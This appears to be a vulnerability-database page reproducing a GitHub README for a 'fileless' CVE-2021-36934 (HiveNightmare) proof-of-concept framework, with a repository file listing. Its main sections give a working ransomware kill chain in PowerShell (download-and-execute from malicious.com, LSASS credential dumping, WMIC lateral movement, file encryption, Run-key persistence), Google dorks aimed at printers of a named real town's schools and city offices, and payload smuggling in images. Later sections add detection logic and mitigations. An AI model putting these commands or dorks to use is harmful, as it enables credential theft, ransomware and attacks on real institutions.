PoC details: 34f213a244a2b70b450ce8e6df554865b22fda04

Source
Related vulnerability
Title: Microsoft Windows access control error vulnerability (CVE-2021-36934)
Description: Microsoft Windows is a desktop operating system from Microsoft Corporation of the United States. Microsoft Windows contains an access control error vulnerability that stems from overly permissive access control lists on several system files, resulting in a privilege escalation vulnerability. An attacker who successfully exploits this vulnerability can run arbitrary code with SYSTEM privileges.
Description
PoC malware that exploits CVE-2021-36934 (improper ACLs on shadow copies) using a fileless red team method on Windows 10/11 with LOLBins, extracting the SYSTEM and SAM hives for local NTLM hashes.
Introduction


# HiveNightmare 'Fileless' Exploit PoC

![Screenshot 2025-05-21 001453](https://github.com/user-attachments/assets/15ccb34b-483d-497a-8fa9-70f0f61232d6)

---

## Table of Contents

- [Overview](#overview)
- [Features](#features)
- [Lab Simulation Example](#lab-simulation-example)
- [Reconnaissance with Google Dorks](#reconnaissance-with-google-dorks)
- [LOLBins Overview](#lolbins-overview)
- [Fileless Dropper Embedding](#fileless-dropper-embedding)
- [Exploiting Print Spooler & HiveNightmare](#exploiting-print-spooler--hivenightmare)
- [Reflective DLL Injection](#reflective-dll-injection)
- [MITRE ATT&CK Mapping](#mitre-attck-mapping)
- [Detection & Mitigation](#detection--mitigation)
- [Legal Disclaimer](#legal-disclaimer)
- [References & Further Reading](#references--further-reading)

---

## Overview

**CVE-2021-36934/HiveNightmare** is an educational red/purple team research project that simulates a **fileless malware** attack framework on **Windows 11**. It enables the emulation of real-world adversary kill chains using [MITRE ATT&CK](https://attack.mitre.org/) techniques, with a focus on stealthy, fileless operations.

> **Warning:** For research and training in isolated labs only. **Do not use on production or unauthorized systems.**

---

## Features

- Simulates end-to-end fileless ransomware/wiperware attacks
- Demonstrates use of Living Off the Land Binaries (LOLBins)
- Showcases credential access, privilege escalation, lateral movement, and persistence
- Contains practical lab and reconnaissance examples
- Maps to MITRE ATT&CK for blue team detection exercises

---

## Lab Simulation Example

The following PowerShell simulation demonstrates a typical fileless ransomware attack chain using built-in Windows tools (LOLBins):

```powershell
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]::Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"
```

---

## Reconnaissance with Google Dorks

**Example Objective:** Identify publicly exposed printer services in Moberly, Missouri, potentially vulnerable to exploits like PrintNightmare.

**Sample Google Dork Queries:**

```
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"
```

---

## LOLBins Overview

**Living Off the Land Binaries (LOLBins)** are legitimate, trusted Windows binaries commonly abused by adversaries to bypass security controls and run malicious code filelessly.

**Example Use (Print Service Attack):**

```cmd
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry
```

> Attackers use LOLBins like `rundll32.exe`, `regsvr32.exe`, and `powershell.exe` to execute payloads from network shares, often after identifying exposed printers or servers via reconnaissance.

---

## Fileless Dropper Embedding

**Goal:** Deliver payloads covertly by embedding archives within images and extracting them using native tools.

**Steps:**

1. **Embed Payload:**
   ```cmd
   copy /b nsfw.jpg + payload.7z nsfw.jpg
   ```

2. **Extract & Decode:**
   ```cmd
   certutil -decode nsfw.jpg dropper.7z
   7z x dropper.7z -oC:\Users\Public\
   ```

> This method bypasses traditional file extension filtering and leverages built-in tools for evasive delivery.

---

## Reflective DLL Injection

**Technique:** Load and execute a malicious DLL directly in memory using reflective loading.

**Example:**
```cmd
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry
```

> This enables stealthy, in-memory execution without leaving artifacts on disk.

---

## MITRE ATT&CK Mapping

| Phase                | Technique                               | ID                   | Description                                              |
|----------------------|-----------------------------------------|----------------------|----------------------------------------------------------|
| Initial Access       | Valid Accounts / Drive-by Compromise    | T1078, T1189         | Compromising public-facing print interfaces              |
| Execution            | DLL Side-Loading / LOLBins              | T1218, T1055.001     | Running DLLs reflectively via trusted binaries           |
| Privilege Escalation | Print Spooler Exploits / Hive ACL Abuse | T1068, T1003.002     | SYSTEM-level access and SAM hash extraction              |
| Defense Evasion      | Fileless Execution / Obfuscated Files   | T1027, T1202         | Encoded payloads delivered via certutil, mshta, etc.     |
| Credential Access    | LSASS Dumping / SAM Hive Access         | T1003                | Credential dumping post HiveNightmare                    |
| Lateral Movement     | SMB/Net Share Enumeration               | T1021.002            | Spread via printer shares or spooler enumeration         |
| Impact               | Data Destruction / Encryption           | T1485, T1486         | Fileless wiperware triggered via DLL payloads            |

---

## Detection & Mitigation

### Detection

- **Sysmon + Sigma Rules:**
  - Monitor `rundll32.exe` loading non-system DLLs
  - Watch for abnormal use of `certutil.exe`, `regsvr32.exe`, `mshta.exe`
  - Track shadow volume access by non-admins

- **SIEM Examples (ELK/Splunk):**
  - Alerts on execution from public shares
  - Parent/child process anomalies (e.g., `explorer.exe` spawning `rundll32.exe`)
  - Suspicious encoded commands in PowerShell or CMD
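As an added example (not code from the original repository), the detection bullets above expressed as triage logic over constructed Sysmon-style process-creation events; the event field names follow Sysmon Event ID 1, and the user names and the `10.10.0.5` share are assumptions:

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe \\10.10.0.5\share\nsfw.dll,ReflectEntry", "User": r"LAB\alice"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -decode nsfw.jpg dropper.7z", "User": r"LAB\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgA", "User": r"LAB\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Users\Public\SAM",
     "User": r"LAB\alice"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "User": r"NT AUTHORITY\SYSTEM"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
ADMIN_SUFFIXES = ("\\system", "\\administrator")

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def triage(event: dict[str, str]) -> list[str]:
    """Return the detection labels an event trips; an empty list means nothing matched."""
    hits: list[str] = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    low = cmd.lower()
    if image == "rundll32.exe":
        # The first argument names the DLL: flag UNC shares and anything outside system dirs
        m = re.match(r'^(?:"[^"]*rundll32\.exe"|\S*rundll32\.exe)\s+"?([^",\s]+)', cmd, re.I)
        dll = m.group(1).lower() if m else ""
        if dll.startswith("\\\\") or not dll.startswith(SYSTEM_DIRS):
            hits.append("rundll32_non_system_dll")
        if parent == "explorer.exe":
            hits.append("explorer_spawned_rundll32")
    if image == "certutil.exe" and re.search(r"\s-(decode|encode|urlcache)\b", low):
        hits.append("certutil_abuse")
    if image == "powershell.exe" and re.search(r"\s-(e|ec|enc|encodedcommand)\b", low):
        hits.append("powershell_encoded_command")
    if "harddiskvolumeshadowcopy" in low and not event["User"].lower().endswith(ADMIN_SUFFIXES):
        hits.append("shadow_copy_access_non_admin")
    return hits

def alerts(events: list[dict[str, str]]) -> list[int]:
    return [i for i, e in enumerate(events) if triage(e)]  # indexes that tripped a detection
```

Only the last event, a system-directory DLL run by SYSTEM under `svchost.exe`, passes cleanly; the shadow-copy rule keys on the `HarddiskVolumeShadowCopy` device path that HiveNightmare-style reads of the hives go through.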

### Mitigation

- Disable Print Spooler where not needed:
  ```powershell
  Stop-Service -Name Spooler -Force
  Set-Service -Name Spooler -StartupType Disabled
  ```
- Apply all security patches and harden ACLs
- Block or restrict LOLBins with AppLocker or WDAC
- Use EDR solutions that detect reflective DLL loading and in-memory attacks
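As an added example (not the project's own code), a parser for `icacls` output that flags the CVE-2021-36934 condition on the hive files, a low-privilege principal holding read access; the two output samples are constructed, while the path and principal names are standard Windows values:

```python
import re

# Constructed icacls output for C:\Windows\System32\config\SAM on a host in the
# CVE-2021-36934 state and after the published workaround; not captured from a real machine.
VULNERABLE_ICACLS = r"""C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
FIXED_ICACLS = r"""C:\Windows\System32\config\SAM NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that should never be able to read SAM, SYSTEM or SECURITY
LOW_PRIV_PRINCIPALS = {"builtin\\users", "everyone", "nt authority\\authenticated users",
                       "nt authority\\interactive"}
# icacls simple-rights tokens that include read access
READ_TOKENS = {"F", "M", "RX", "R", "GR", "RD"}

def parse_icacls(output: str) -> dict[str, list[tuple[str, list[str]]]]:
    """Map each path in icacls output to its (principal, permission tokens) entries.
    Assumes paths without spaces, which holds for the hive files under System32\config."""
    aces: dict[str, list[tuple[str, list[str]]]] = {}
    current = ""
    for line in output.splitlines():
        if not line.strip() or line.startswith("Successfully"):
            continue
        if not line.startswith(" "):
            # The first line of each file carries the path followed by its first ACE
            current, _, line = line.partition(" ")
            aces[current] = []
        principal, _, perms = line.strip().rpartition(":")
        aces[current].append((principal, re.findall(r"\(([^)]+)\)", perms)))
    return aces

def exposed_hives(output: str) -> dict[str, list[str]]:
    """Return {path: [low-privilege principals holding read access]} for exposed files only."""
    findings: dict[str, list[str]] = {}
    for path, entries in parse_icacls(output).items():
        readers = [p for p, tokens in entries
                   if p.lower() in LOW_PRIV_PRINCIPALS and READ_TOKENS & set(tokens)]
        if readers:
            findings[path] = readers
    return findings
```

Microsoft's published workaround re-enables inheritance on the hive files with `icacls %windir%\system32\config\*.* /inheritance:e` and then deletes existing VSS shadow copies and restore points, because copies taken while the ACL was permissive still expose the old hive contents even after the live files pass this check.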

---

## Legal Disclaimer

> **All content, code, and techniques in this repository are for educational and authorized penetration testing only. Do not use any part of this project outside of controlled, isolated environments and without explicit permission. The authors assume no liability for misuse.**

---

## References & Further Reading

- [LOLOL Farm – LOLBin Playground](https://lolol.farm/)
- [LOLGEN – Generate LOLBin Chains](https://lolgen.hdks.org/)
- [Detecting SeriousSam](https://medium.com/@mvelazco/detecting-serioussam-cve-2021-36934-with-splunk-855dcbb10076)
- [DLL Injection Primer](https://www.crow.rip/crows-nest/mal/dev/inject/dll-injection)
- [Print Spooler Exploit Chain](https://itm4n.github.io/printnightmare-not-over/)
- [Fileless Malware – Wikipedia](https://en.wikipedia.org/wiki/Fileless_malware)
- [PrintSpoofer (Original)](https://github.com/itm4n/PrintSpoofer/tree/master)
- [HiveNightmare](https://github.com/GossiTheDog/HiveNightmare)
- [MITRE ATT&CK T1055.001](https://attack.mitre.org/techniques/T1055/001/)
- [HiveNightmare demo](https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5)

---

**Stay safe, research responsibly, and always use in a legal and ethical manner.**
File snapshot

```
[4.0K] /data/pocs/34f213a244a2b70b450ce8e6df554865b22fda04
├── [4.0K] core
│   ├── [ 219] build_sfx.ps1
│   ├── [ 787] build_windows.bat
│   ├── [  59] config.txt
│   ├── [4.0K] nightmare
│   │   ├── [6.1K] dll_inject.cpp
│   │   ├── [ 925] dllmain.cpp
│   │   ├── [ 154] framework.h
│   │   ├── [6.0K] hive_nightmare.cpp
│   │   ├── [4.0K] include
│   │   │   ├── [ 659] data_wipe.h
│   │   │   ├── [3.1K] defines.h
│   │   │   ├── [2.9K] devhook.h
│   │   │   ├── [ 983] device_io.h
│   │   │   ├── [ 794] fast_crypt.h
│   │   │   ├── [ 501] misc.h
│   │   │   ├── [ 771] misc_mem.h
│   │   │   ├── [505K] ntifs.h
│   │   │   └── [ 219] prng.h
│   │   ├── [8.4K] nightmare.vcxproj
│   │   ├── [1.3K] nightmare.vcxproj.filters
│   │   ├── [ 168] nightmare.vcxproj.user
│   │   ├── [4.3K] nsfw.cpp
│   │   ├── [ 694] nsfw.h
│   │   ├── [ 191] pch.cpp
│   │   ├── [ 576] pch.h
│   │   └── [4.0K] x64
│   │       ├── [4.0K] Debug
│   │       │   ├── [ 62K] nightmare.dll
│   │       │   └── [1.6M] nightmare.pdb
│   │       └── [4.0K] Release
│   │           ├── [102K] nightmare.dll
│   │           └── [4.1M] nightmare.pdb
│   └── [1.4K] nightmare.sln
├── [177K] dropper.pdf
├── [4.0K] lab
│   ├── [4.0K] atomic red
│   │   ├── [1.3K] run_tests.py
│   │   └── [4.0K] tests
│   │       └── [1.7K] hive_nightmare.yml
│   ├── [4.0K] caldera
│   │   ├── [ 799] deploy_caldera.sh
│   │   └── [4.0K] plugin
│   │       └── [ 320] songbird.yaml
│   ├── [4.0K] docs
│   │   ├── [162K] 13007-reflective-dll-injection.pdf
│   │   ├── [ 72K] Fileless-malware-Matko-Antun-Bekavac.pdf
│   │   └── [1.5M] hivenightmare-aka-serious-sam-cve-2021-36934.pdf
│   ├── [4.0K] logs
│   │   └── [1.0K] export_logs.ps1
│   ├── [4.0K] lolbins
│   │   ├── [3.1K] attempted_credential_dump_from_registry_via_reg_exe.yml
│   │   ├── [3.3K] certutil_download_with_urlcache_and_split_arguments.yml
│   │   ├── [3.5K] certutil_with_decode_argument.yml
│   │   ├── [1.8K] command_and_control_certutil_network_connection.toml
│   │   ├── [1.5K] credential_access_dump_registry_hives.toml
│   │   ├── [1.6K] defense_evasion_suspicious_certutil_commands.toml
│   │   ├── [1.9K] defense_evasion_unusual_network_connection_via_rundll32.toml
│   │   ├── [1.6K] Netsh.yml
│   │   ├── [1.8K] powershell.yml
│   │   ├── [1.3K] proc_creation_win_certutil_download.yml
│   │   ├── [1.2K] proc_creation_win_certutil_encode.yml
│   │   ├── [ 610] proc_creation_win_lolbin_pktmon.yml
│   │   ├── [1.0K] proc_creation_win_netsh_helper_dll_persistence.yml
│   │   ├── [2.1K] proc_creation_win_reg_dumping_sensitive_hives.yml
│   │   ├── [1.1K] proc_creation_win_regedit_import_keys_ads.yml
│   │   ├── [1.2K] proc_creation_win_regedit_import_keys.yml
│   │   ├── [3.9K] proc_creation_win_rundll32_susp_activity.yml
│   │   ├── [2.1K] processes_created_by_netsh.yml
│   │   ├── [2.7K] processes_launching_netsh.yml
│   │   ├── [3.9K] Rundll32.yml
│   │   ├── [1.7K] Schtasks.yml
│   │   ├── [2.3K] Sc.yml
│   │   ├── [ 14K] the_lolbas_project.json
│   │   └── [117K] The_LOLBAS_Project.svg
│   ├── [4.0K] loldrivers
│   │   ├── [611K] 275c80c5-a67c-4536-b29e-4e481242cb01.md
│   │   └── [283K] 275c80c5-a67c-4536-b29e-4e481242cb01.yaml
│   ├── [1.9K] mitigation.ps1
│   └── [2.3K] rundll32_dump.txt
├── [1.1K] LICENSE
└── [8.3K] README.md

15 directories, 67 files
```